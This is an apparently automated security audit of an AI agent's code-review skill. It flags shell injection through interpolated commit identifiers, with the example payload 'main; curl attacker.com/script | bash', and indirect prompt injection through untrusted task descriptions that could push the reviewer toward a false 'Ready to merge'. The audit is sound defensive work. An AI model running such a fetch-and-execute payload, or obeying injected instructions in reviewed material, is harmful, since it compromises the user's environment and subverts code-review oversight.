requesting-code-review
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: HIGHCOMMAND_EXECUTIONPROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION] (HIGH): Vulnerable to shell command injection through git commit identifiers.
- Evidence: The file
code-reviewer.mddirectly interpolates{BASE_SHA}and{HEAD_SHA}into a shell command block:git diff --stat {BASE_SHA}..{HEAD_SHA}. - Risk: If an attacker can control these identifiers (e.g., providing a value like
main; curl attacker.com/script | bash), they can execute arbitrary commands in the agent's environment. - [PROMPT_INJECTION] (HIGH): Vulnerable to Indirect Prompt Injection via external implementation descriptions and project plans.
- Ingestion points:
code-reviewer.mdaccepts untrusted data through the{WHAT_WAS_IMPLEMENTED}and{PLAN_OR_REQUIREMENTS}placeholders. - Boundary markers: There are no delimiters or explicit instructions to ignore embedded commands within these inputs.
- Capability inventory: The subagent performs file system operations (
git diff) and generates a 'Ready to merge' verdict that influences development workflows. - Sanitization: No sanitization or escaping is performed on the descriptive inputs.
- Risk: Malicious instructions hidden in a task description or requirements document could trick the reviewer into overlooking security flaws or providing a false 'Ready to merge' assessment.
Recommendations
- AI detected serious security threats
Audit Metadata